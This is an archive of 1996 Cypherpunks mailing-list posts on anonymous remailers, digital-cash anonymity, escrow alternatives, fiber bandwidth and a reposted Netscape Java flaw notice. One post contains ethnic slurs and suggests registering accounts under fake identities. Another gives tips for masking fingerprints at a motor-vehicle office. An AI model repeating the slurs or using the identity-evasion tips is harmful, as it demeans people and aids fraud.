      Hayden says it's a part of his effort to take the eek 
      out of geek -- to turn what's largely thought of as a 
      negative stereotype into something positive. "Gates had 
      an opportunity to be one and he gave it up. That 
      happened when he decided that making money is more 
      important than making good computer code. One geek trait 
      is that you take pride in your work and it's my opinion 
      that Microsoft hasn't produced a lot that's to be proud 
      of." 
 
      "In a nutshell, a nerd is somebody who lets technology 
      run their life and a geek is a person who runs their 
      life with technology." 
 
   GEK_cod 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 19 May 1996 03:14:56 +0800
To: cypherpunks@toad.com
Subject: RUL_net
Message-ID: <199605171635.QAA19173@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   May-June, 1996, Harvard Business Review. Two related 
   articles which examine c'punks interests -- proposed 
   business regulation of the Net; on-line security; 
   copyright; encryption; authentication; E-cash; electronic 
   commerce; protected communities to escape "frontier 
   anarchy," and more. 
 
   Executive summaries by HBR: 
 
 
   "Ruling the Net." Debora Spar and Jeffrey J. Bussgang 
 
   The Internet promises a radical new world of business. But 
   for many companies, it has yet to deliver. Although doing 
   business in cyberspace may be novel and exhilarating, it 
   can also be frustrating, confusing, and even unprofitable. 
 
   Debora Spar and Jeffrey Bussgang argue that the problems 
   companies face have little to do with a lack of technology 
   or imagination. Their problems stem instead from a lack of 
   rules. Without the order that rules create, business cannot 
   be conducted. 
 
   The authors explain why the informal rules that have 
   developed on the Internet since the 1960s are no longer 
   sufficient. Businesses thinking of allowing millions of 
   dollars of transactions to occur on the wide-open Net need 
   specific assurances. They require clear definitions of 
   property rights, a safe and useful means of exchange, and 
   a way to locate and punish violators of on-line rules. 
 
   The authors believe that the key to commerce on the 
   Internet lies in the creation of managed on-line 
   communities. Such communities can be formed by service 
   providers -- entities that will restrict on-line options, 
   fine-tune offerings to match a select group of users, and 
   provide some means of recourse in cases of fraud or abuse. 
   Under those conditions, they will draw new companies 
   on-line and increase the productivity of those already 
   there. And, say the authors, the rewards for service 
   providers will be substantial: Companies that make the 
   rules on the Internet's emerging frontier have the 
   opportunity to reap the greatest profits. [40 kb] 
 
 
   "The Real Value of On-Line Communities." Arthur Armstrong 
   and John Hagel III 
 
   The notion of community has been at the heart of the 
   Internet since its early days, when scientists used it to 
   share data, collaborate on research, and exchange messages. 
   But how can businesses best use its community-building 
   capabilities? Not merely by putting their products or 
   services on-line, the authors contend. Real value will come 
   from providing people with the ability to interact with one 
   another -- from satisfying their multiple social needs as 
   well as their commercial needs. Companies that create 
   strong on-line communities will command customer loyalty to 
   a degree hitherto undreamed of and, consequently, will 
   generate strong economic returns. 
 
   The authors present four different types of community: 
   communities of transaction, interest, fantasy, and 
   relationship. Examples of each type already can be found on 
   the Internet or through on-line services, but the 
   successful community of the future will incorporate all 
   four -- or as many as possible. As for economic value, the 
   authors see four ways for a company to generate returns: 
   through usage fees, content fees, transactions and 
   advertising, and synergies with other parts of its 
   business. 
 
   In the near future, new business definitions may emerge 
   around the notion of owning a specific customer segment 
   across the full range of its interests and needs; owning 
   specific products and services may no longer be so 
   important. The authors urge businesses marketing to 
   consumers to make the small investment required to "buy an 
   option" on electronic communities in order to understand 
   both their potential value and the radical changes they may 
   cause. [33 kb] 
 
 
   RUL_net (for the 2, in 4 parts) 
 
   ----- 
 
   Reprints of "Ruling," No. 96309 and "Real Value," No. 96301 
   may be ordered from HBR for $5.00 each by email to: 
 
      custserv@cchbspub.harvard.edu 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 18 May 1996 15:51:28 +0800
To: (remailer fans)
Subject: Forced to your knees by Legal VIOLENCE
In-Reply-To: <Pine.LNX.3.93.960516193002.1235E-100000@smoke.suba.com>
Message-ID: <199605180030.RAA06625@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> On Wed, 15 May 1996, Be Good wrote:
> > 
> > So what is the expense of setting up a full-featured server
> > like hacktic?  Mr. Graves should start up a new server, and
> > tcmay is rich, so he has no excuse.
> 
> 	No, rich is a good excuse for _not_ doing it, unless it can be
> done with total anonymity. If I set up a remailer, on my home computer, as
> an individual, then I am a very little target. I have nothing (well, damn
> little) for anyone to sue me over. What would be the point? They threaten
> to sue me for what? They would spend FAR more than they could ever get out
> of me, and as long as I don't violate any laws, I _might_ be able to get
> "big guns" like the ACLU, EFF etc. on my side to make it a nasty fight for
> no return. 

I wasn't thinking of liability, just capacity.

And you don't understand political harrassment suits.
Would you believe that someone worth $50,000 could be served a
$10,200,000 judgement by a jury, fully upheld by the Oregon and U.S.
Supreme courts, Dwelling, business, custumers' property seized,
25% of income annexed for 20 years, all by the plaintiff with
the assistance of the court, merely for publicy speaking to a crowd,
the advocacy of violence, when later that night two members of the
audience murdered a stranger apparantly following that "advice,"
with the plaintiff publicly gloating before|during|post trial, that the
actual violence was merely a VEHICLE for the SUPPRESSION of the
organization of the advocacy of the ENTIRE political spectrum of the
defendants?

Ask our resident "free speech for RESPECTABLE dissidents,"
L. Lurch@stanford.edu (racial capitali$t d0g)
for a virulent defense of Co$ style tactics against racists.
Ask him about SPLC, Seraw vs WAR, Tom, John METZGER.

Straight from the horses ass, go to the library and read 89-93 issues
of KLANWATCH to find out what lying oriental anti-racists
are ADVOCATING and GETTING.

What the hell is the difference between the anti-racist tactics
of Co$ and SPLC, and being forced to your knees by the policeman's
nightstick, merely for advocating "moronic" politics? 
The VIOLENCE to free speech rights is the same.

> 	Someone like Mr. May has assets that can be gotten, so there is
> potential for gain from a lawsuit against him, both financially and
> otherwise. 

Do you really think that SPLC and Co$ sue to raise funds?

> 	Rich is neither reason, nor excuse. Capability is the issue. It

True, I doubt he would take the risk.  What we mean is that once
an EASY remailer tech is distributed, THOUSANDS will seriously be
interested in it.  After all, did the complexity of linux keep
100,000+ unix newbies from learning *ix from scratch?

> would probably be easier for me to run a remailer than Mr. May, not that I
> am better equipped mentally, but (until I started posting to this list).
> 
> 	Come to think of it, would the Mixmaster package run under Xenix?
> I have a 286 laying around collecting dust...

Ugh.  I've got a 386 and 4megs, partitioned and compiled linux, pgp,
Mixmaster.  It WILL work once mastering the darned thing.

IMHO, the IDEAL remailer is the following:

What CAN be done right now, with anyone with linux and shell unix,
account paid by fake name/address with postal money order,
is have the linux machine dial up the account, several times a day,
process the mailbox, download the mail, process the mail with pgp or 
mixmaster, upload to account, post/email with the appropriate 
header lines and VOILA!!  

!!!!!!!!!! FULL FEATURED HACKTIC STYLE REMAILER !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Unfortunately I DON'T know how to DO any of this.
Isn't someone else want to crank something out and share?
Post around instructions for the clueless to follow.

There.  The number of full featured remailers increases from 0 to 100-300+.






--
Serenity, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sawyer@nextek.com (Thomas J. Sawyer)
Date: Sat, 18 May 1996 21:24:09 +0800
To: cypherpunks@toad.com
Subject: Re: Securing CDROM from piracy
Message-ID: <v02140b00adc26bd1b78c@[199.173.75.113]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>> >Is there any way of making
>> >sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot
>> >duplicate the thing and start selling it without sharing the profit.
>>
>> Well, I suppose you could get it copyrighted before you hand it over for
>> distribution.  I'd also put my logo and other info somewhere in the code,
>> such as an "About" box.  They would have a hard time saying it wasn't
>> yours.
>>
>You are missing the point. Lets say a firm X is marketing my product. Now if
>they sell 500,000 copies and tell me that they have sold only 100,000, I have
>no way of figuring out.
>
>   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
>     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com

Ok, I see what your looking for now. How about tracking the number of
product registrations, either via a mail-in card or fax? I'm assuming
that since this is a product to be sold, not given away, that persons
purchasing the program would most likely take the time to fill out a
product registration card and send it in.  Since not everyone fills these
cards out, it is not a 100% accurate method, but if there were any major
discrepancies, then you would be aware of it.

Thomas J. Sawyer
sawyer@nextek.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 04:43:06 +0800
To: cypherpunks@toad.com
Subject: Re: Past one terabit/second on fiber
Message-ID: <adc2743605021004efcd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 PM 5/15/96, E. ALLEN SMITH wrote:
>        One problem with the development of such high-end technologies is that
>they tend to increase economies of scale to the point where it's impractical to
>have anything but a monopoly or ogliopoly. As well as concerns about the degree
>of control such an organization may be able to exert in and of itself (acting
>like a government, in essence), there's also that such an organization is
>easier to pressure than a lot of small providers. Anyone have a suggested
>solution, or reasons that I shouldn't be so worried?

Personally, I'm not terribly worried by such concentrations (for reasons
I'll mention at the end).

But I'll note that Eric Fair's recent post described the far-from-geodesic
traffic situation, with a relatively small number of "super-nodes" (like
"MAE-West" and her sisters) handling huge fractions of traffic. These
super-nodes are obvious points of attack (in the nuclear war--or
terrorist--scenario oft-cited as the motivation for packet-switching) and
lessen the "geodesic" nature of the Net.

Economies of scale may be pushing us away from the "full-distributed"
geodesic nature toward super-nodes.

The reason I am not really too worried is that encryption and remailers
allow a kind of "meta-geodesic" network to be (virtually) layered on top of
the physical network.

(In the famous network hierarchy of network levels, it seems we can add a
new level.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 05:45:53 +0800
To: cypherpunks@toad.com
Subject: Is Chaum's System Traceable or Untraceable?
Message-ID: <adc276f5060210049520@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 PM 5/17/96, jim bell wrote:
>At 10:09 AM 5/16/96 +0200, bryce@digicash.com wrote:

>>Let me get this straight.  You are asking for full payee/payor
>>anonymity so that you can institute a program of anonymous
>>assassination contracts, right?
>
>It's not just for me.  I seem to recall a comment around here (Tim May,
>perhaps?) who said that when he first read of digital cash in the late
>1980's, the feature of payee anonymity was present, and that he was
>surprised later to see early implementations not containing this.

Yes, this was I (or "me").

I first read of Chaum's work in late '85, in his CACM article, and then
"rediscovered" it when I was doing some review work for Phil Salin's AMIX
information market startup in 1987.

Certainly the text of Chaum's articles implied both payer and payee
anonymity, though certain details may've been unclear to some of us.

When Chaum unveiled his "payer is anonymous, but payee is traceable," some
of us were surprised.

(On the other hand, I have had a longstanding faith that the system can be
made to be both payer- and payee-anonymous. Moneychangers, for example.)

>Deal with the devil?
>
>Any "complete" digital cash implementation has to provide for payee anonymity.
>

I agree with Jim Bell on this completely. I don't know if Chaum has been
seduced by the Dark Side, or is looking to get digicash widely deployed by
"respectable" institutions, or is telling the truth (that his system
_never_ provided for real untraceability), but I know that Cypherpunks
should always strive for full untraceability.

One-sided traceability is not enough.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 19 May 1996 04:33:00 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <Pine.SUN.3.93.960515182525.10635F-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.93.960517183716.1298A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Black Unicorn wrote:
> 
> I would really like to see a remailer that is somehow blinded.
> I don't know enough about how mail paths are generatered, but is it
> impossible to conceal the origin of remailer postings? 
> Postings made to remailernym@alpha.c2.org would be spit out somewhere but
> without accountability?
> 
> Impossible?  Would do wonders defeating traffic analysis.
> 
> I'd consider running a remailer, but after listening to the response to
> the anonymous poster a while back, it sounds like there are few if any
> simple options which do not require major time and effort to setup and
> run.

	I was thinking about this last night, hence my question about
running mixmaster under Xenix (or minux for that matter).

	How about this as an idea:

	Get a few (3 to 5) accounts in a high density market (i.e. lots of
ISP's locally) set up a unix machine on a cheap machine. Have the anon
messages get sent to the pop accounts. Once an hour (or less depending on
budget) have the unix box poll the different pop accounts mix the messages
and resend them the next hour. 
	This could be further obfuscated by batching the messages up and
posting a whole chunk of messages to a different similar remailer else
where, or by just plopping an encrypted tar'd file on a ftp site where
another remailer grabs them and splits and remails them.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 16:41:43 +0800
To: cypherpunks@toad.com
Subject: "Too cheap to meter"
Message-ID: <adc27a68070210046471@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM 5/16/96, Alan Horowitz wrote:
>Hey, let's build faster and faster fiber-optic networks. Let's create
>bandwidth so cheap that it won't even pay to meter it.

"Too cheap to meter"? Wasn't that what nuclear power promised in the 1950s?

(I'm actually a supporter of nuclear power, for a variety of reasons, so
this is not meant as just a cheap shot against nuke plants. But this was
one of the "selling points" of nuclear, later shown to be a falsehood.)

Alan's irony is well-placed. The most egregious repetition of the "too
cheap to meter" nonsense is George Gilder's "dark fiber" vision...a vision
of "infinite bandwidth" to all users.

Guess what? If Gilder's "dark fiber" is ever built, there are a lot of
folks who will "fill it" rather quickly. Canter and Siegel were just the
beginning. "Too cheap to meter" goes away pretty quickly.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 18 May 1996 16:25:59 +0800
To: cypherpunks@toad.com
Subject: RISKS: YANSF (Yet Another Netscape Security Flaw)
Message-ID: <v01540b05adc2ec47083c@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Reposted from RISKS:

----------------------------------------------------------------------

Date: Fri, 17 May 1996 17:11:34 -0400
From: Ed Felten <felten@CS.Princeton.EDU>
Subject: Netscape 2.02 RISK

SECURITY FLAW IN NETSCAPE 2.02

We have discovered an attack that allows a Java applet running under
Netscape Navigator 2.02 to generate and execute arbitrary machine code.
The attack combines a new security bug found by Tom Cargill with some ideas
previously discovered by the Princeton team.  We have implemented a
demonstration applet that deletes a file.  We are not yet releasing
technical details.

For more information, contact Ed Felten (felten@cs.princeton.edu,
609-258-5906), or see http://www.cs.princeton.edu/sip/News.html

Tom Cargill
Independent Consultant
http://www.csn.net/~cargill/

Dirk Balfanz, Drew Dean, Ed Felten, Dan Wallach
Dept. of Computer Science, Princeton University
http://www.cs.princeton.edu/sip/

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Sat, 18 May 1996 20:28:36 +0800
To: cypherpunks@toad.com
Subject: Re: Past one terabit/second on fiber[PHONE GEEK TALK]
Message-ID: <199605171728.TAA09634@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


> No comment :-)  And I certainly don't presume to speak for Lucent....

	And to think that some of Lucent's next fiber products will
include some technology developed by cypherpunks. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 17:24:45 +0800
To: cypherpunks@toad.com
Subject: Why the Poor are Mostly Deserving of their Fate
Message-ID: <adc286c5080210044c33@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:18 AM 5/17/96, snow wrote:
>On Wed, 15 May 1996, Jim McCoy wrote:

>> There are two kinds of libertarians, those who hate the poor and those who
>> don't.  I always seem to meet the former, I am beginning to suspect the
>> latter don't exist.

By the way, I certainly don't "hate the poor," as a class. More on this in
a bit, but I certainly was not raised in a wealthy family, and I started my
working career living in a tiny (and I do mean tiny) studio apartment in
Santa Clara, CA.

>        Hi Mr. McCoy, My name is Petro, and I _am_ a poor libertarian
>(well, sort of a libertarian, I tend to think they are a little short
>sighted, and a little to authoritarian to me)  Many of us ARE poor. We may
>not _like_ being poor, and some of us are working to get out of that
>situation, but most of us don't "hate" the poor. We (well, I) hate people
>with their hands out. This is everyone from poor people who _won't_ try to
>get out of their situation, to Multi-billion dollar corporations that
>recieve government grants for over seas advertising to old people who
>didn't plan for their "golden years"  and expect us to provide the gold.

Agreed. I was a libertarian (and a Libertarian, I guess, as I voted for the
first LP candidate, John Hospers, in 1972) even when I was poor, in
college. (No car, and I declined to attend MIT or Stanford, both of whom
had accepted me, as their costs would've been an unduly-large burden on my
parents.)

Once working and ensconced in my tiny little studio apartment, I worked my
butt off, working 10 hour days, 6 days a week, and sometimes some 16 hour
days (no overtime). I made it a point to save as much as I could, foregoing
various immediate gratifications that many in my cohort were partaking of.

By the time I'd been working for 6-8 years, things really started to pay
off, financially and professionally. I put the money I'd saved into small
companies I thought would do well...companies like Sun, Apple, Genentech,
and, of course, my own company, Intel.

By the time I'd worked there for 12 years, I'd accumulated enough in
savings and investments to never work again. So I bailed out and have lived
the last 10 years doing as I please. (Still sounds good to me.)

My point? Some of it was luck, some of it was hard work, some of it was my
native abilities. But I saw some of my fellow engineers fail to invest,
fail to save...and they are mostly still working. And of course I saw many
in the "larger community" who spent their paychecks, who saw their earnings
go up their nose (remember, this was the 1970s and 80s), and who found as
many ways as they could to avoid hard work.

An important point is this: it wasn't all "luck." At least not in the sense
of luck at a roulette wheel. In fact, nearly all of my cohorts who worked
hard and invested wisely really did well. (And people starting out can do
just as well, perhaps even faster than my cohort did...look at the 3-10x
increases in stock prices in less than 2 years of so many companies!)

The effects are obvious: some of those who failed to study, prepare, work,
save, and invest are now seeking to use "democracy" to take away the assets
of those who did all these things. Many of them talk about "privilege" and
claim that "white males" got all the benefits, conveniently ignoring that
the same benefits were available to any of the Asians, women, or, indeed,
coloreds, who similarly studied, prepared, worked, saved, and invested.

Some of them now claim that we libertarians "hate the poor," that we lack
"compassion."

I'm tempted to say "Fuck them," but that would be rude. Instead, I'll say
that those who think "the poor" are being victimized by "the rich" should
take a close look at how wealth is actually created.

It is only partly "luck" that is responsible for success. I look at the
vast number of new markets and new fortunes that have been created since I
stopped working, and I am more convinced than ever that anyone who is
willing to work in a field which is in demand and who keeps up with
developments, works hard, shows initiative, etc., will do extremely well.

Sadly, about 60% of the adult population of the U.S. doesn't think this
way, doesn't have "the culture of success," and instead looks to the
government to give them benefits, handouts, and jobs.

These people are headed for the scrap heap. Strong crypto builds walls
against this unruly mob.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 17:53:08 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Past one terabit/second on fiber
Message-ID: <199605180328.UAA23861@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 PM 5/17/96 -0400, Alan Horowitz wrote:
>
>> >Now that's progress, don't you think?
>> 
>> Yes, I do!  Because these activities don't just happen by themselves, they 
>> take the place of other activities which were formerly done in their 
place.  
>> The trivial example of sending letters has been replaced by email.
>
>   E-mail is cool. E-mail is lovely. I use it enthusiatically.   It is 
>not the same thing as sitting down with a fountain pen and and some fine 
>stationary. I feel sorry for your significant other if your loveletters 
>go by e-mail.

So you've found one specific instance where you don't think it's appropriate 
to send email.  Big deal!  Try again.


>Yes, let's get people away from reading books. Hey, there's computer 
>games to play, burn that library down, will you?

Want people to read books?  Okay, first put the hurdle in front of them that 
they must go to the library. (This is particularly a hurdle for children, 
when not in school, because they can't drive.)    Then, if the book(s) they 
want to read is already checked out, make them wait 1+ months until it 
returns.  Make them come back to the library to get it, and make them return 
it the same way.

See why some people DON'T read books?

>Quantity of life is not the same as quality of life.  

You're misrepresenting form over substance.  Information is no more valuable 
or trustworthy on paper than on electrons.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Sun, 19 May 1996 03:04:22 +0800
To: cypherpunks@toad.com
Subject: A cryptographic alternative to escrow agents (Matts' half coin)
Message-ID: <2.2.32.19960517185942.003ae7a4@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Black Unicorn wrote (was: Why does the state still stand)

>> .  What if a company does not pay as expected - other than adopting
>> Assassination Politics, what method could an employee use towards
>> getting their expected remuneration for work done?
>
>If payment is made weekly, it should be made in advance to an escrow agent
>who would issue a certificate that the payment for employee r2dd54 has
>been received.  The payment would then not be released to anyone without
>the consent of the corporation and the employee.
>
>Obviously the escrow agent would have to be trusted.

It should be possible to avoid that trusted escrow agent using blinded
ecash and Matts' half coin algorithm.

Bob wants to buy a $100 service from Alice. Alice wants to get paid if she
performs the service.

Bob and Alice each create half of a $300 ecash coin. They send their half
coins to the ecash mint for signing, with instructions to withdraw $200
from Bob's account and $100 from Alice's account for the signing of a
$300 coin.

When the mint has received both half coins, it signs the complete coin,
withdraws the money and returns the signature to both Alice and Bob.
Nobody can now use the coin alone because they don't know the other half
of the random coin number.

Next, Alice delivers the service to Bob.

If Bob is satisfied with the service, he and Alice write a message to the
mint requesting that the complete coin be credited with $100 to Bob's
account and $200 to Alice'. Alice has now been paid.

If Bob refuses to pay, Alice will never give him her half coin and he loses
$200, but he got a $100 service, resulting in a net loss of $100.

If Alice refuses to deliver the service, Bob keeps his half coin and she
loses $100.

Both participants lose $100 each if they don't complete the deal. That
way they have the same incentive to come to an agreement.

To simplify the messages to the mint you could use two coins. One for
$100 and one for $200. That way there would be a one-to-one relation
between deposits, withdrawals and coins.

The algorithm described above (Matts' half coin) is copyrighted by
yours truly Matts Kallioniemi. Patents pending.


Matts Kallioniemi <matts@pi.se>


-----BEGIN PGP SIGNATURE-----

iQEVAwUBMZzMVBVFhWUyiUQRAQHs8Af/TQf8zLYfwictsXoqvOahCvQ1aJ4F6Dem
w6PARUXIhb0XWIFYRZSiXGsRoUVpWiWtupSIf7PHG/dkGfAamvq0wgQpEJm3+7IP
6qSaOYovKnY19GxTo9QHkyHQ8LFu+CSVJMMPoZtX6tCJX62VkFuJapI1CLQOPb78
Ntqf8kNiX1/IpOfrqiF0Fx1YV2nTno417q4vaJYnZWQFJ+sYf5q0NG0xahDPlwUx
I11AtFcpIGOCHek3GGAgH9KYSt6UpAOmk57bSne5+zMN5U78cGDsizLYm+MDtzAx
Nt4FYoeYxM0gKs529ruUgTdfZNqVtsXjjeNlbVBi4hyfczs3b3I7ug==
=oLLR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 19 May 1996 03:57:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Past one terabit/second on fiber
In-Reply-To: <199605160409.VAA18751@pacifier.com>
Message-ID: <Pine.SV4.3.91.960517211843.10748H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> >Now that's progress, don't you think?
> 
> Yes, I do!  Because these activities don't just happen by themselves, they 
> take the place of other activities which were formerly done in their place.  
> The trivial example of sending letters has been replaced by email.

   E-mail is cool. E-mail is lovely. I use it enthusiatically.   It is 
not the same thing as sitting down with a fountain pen and and some fine 
stationary. I feel sorry for your significant other if your loveletters 
go by e-mail.

Yes, let's get people away from reading books. Hey, there's computer 
games to play, burn that library down, will you?

Quantity of life is not the same as quality of life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 19 May 1996 03:48:47 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous companies
Message-ID: <199605180506.WAA03476@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Hal wrote:

> It might be interesting to make a list of all the problems people can
> think of why this idea won't work, paired with proposed solutions and
> workarounds - sort of a mini FAQ for this important (some might say
> ultimate) cypherpunk model.

Another interesting question is how you do personnel selection for an
anonymous enterprise.  One possibility would be anonymous reputation
passing, but I don't know any protocols for this.  A participant would also
want to take any positive reputation accruing away when the enterprise
finished.  (And the rest of us would want any negative reputation to stick
as well.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 18 May 1996 18:16:25 +0800
To: cypherpunks@toad.com
Subject: SMTP Server for sending to anonymous remailers?
Message-ID: <199605180530.WAA03258@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of an anonymous remailer that has an SMTP server
(hopefully unlogged) that I can specify in a special variant of the
"sendmail.cf" sendmail configuration file for sending mail to
anonymous servers?

I use a PPP connection, and right now I'm using my ISP's default
server and I don't like the idea of logs being kept, even though the
messages themselves are chained/encrypted.

Maybe I'm "paranoid", but if I wasn't, I probably wouldn't bother
with PGP, C'punk remailers, etc. <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 May 1996 20:30:18 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Defeating fingerprints  [NOISE]
Message-ID: <199605180704.AAA25160@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Topic that won't die, I guess.  There's a nail-polish variant
called "ridge filler" that may help fill things in,
and Plastic Wood comes in pink enough colors it may get
you through a trip to the CA Motor Vehicle Department registration,
though it won't stop an intelligent person looking at your fingers.

[And no, I didn't think of it; I'd been dealing with the question
of exactly what citizenship papers were required for the thugs.
On the other hand, when my father-in-law moved to Hawaii many years ago,
the law required that you provide either a SSN or a thumbprint
when you apply, and the clerks were really annoyed that he made
them do a thumbprint instead of just writing down an SSN.]
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 19 May 1996 02:15:38 +0800
To: "'cypherpunks@toad.com>
Subject: FW: anonymous companies
Message-ID: <01BB444D.D20F28C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Wei Dai

A company implies a particular kind of persistent structure, with a
hiearchy of owners, managers, and employees.  It is far from clear to me
that this is the most likely organizational form in an anonymous digital
economy.  One possible alternative is to have no persistent organizations. 
Teams form spontaneously to work on individual projects.  Each individual
member jointly negotiates a contract with every other member, and these
contracts are enforced through some arbitration system.
.........................................................................................

This "virtual corporation" is something that I've read about (about 2 years ago) which is an idea already in use -  someone has an idea for a kayak design, then he contracts out to other individuals all the different kinds of work he needs done to get it built.  As soon as the project is complete, the company dissolves.

But here is where I think the problems with an attempt at total anonymity will occur, as has been mentioned:  where the virtual meets the actual, where the anonymous electronic interaction must meet the solid real to complete the transaction.

The work of constructing physical things must be accomplished in an actual location.  If the place is rented, rather than owned, the renter will be able to identify the rentee.   Solid objects like kayaks need materials for construction.   Someone must 1) get the particular kind of material which the kayak design requires, and 2) make it available for distribution to those who will want to use it.   Material or parts buyers must be able to examine the stuff to make a purchasing decision.  These must be delivered to an actual physical location.  If large trucks are rented to deliver these things, then the drivers must know where that location actually is to deliver them.  

Once the kayaks are constructed, they also must be delivered to the owner or to a store or storage building.  They must be inspected for quality and meeting design specifications.  They must be sold where individuals can look at the kayak, perhaps sit inside, and compare it with other models elsewhere (I don't think just looking at a photo on a web page will do for every purchasing decision).  Back stock requires storage and probably someone to guard the building.   Perhaps the kayak purchaser will want lessons on using the thing, in an actual river.

In all these situations, decisions must be made which require a physical presence and interaction with the material of construction, with the object of attention.  This is a point where anonymity would be very difficult and loss of confidence possible (if someone reneged on their agreements).

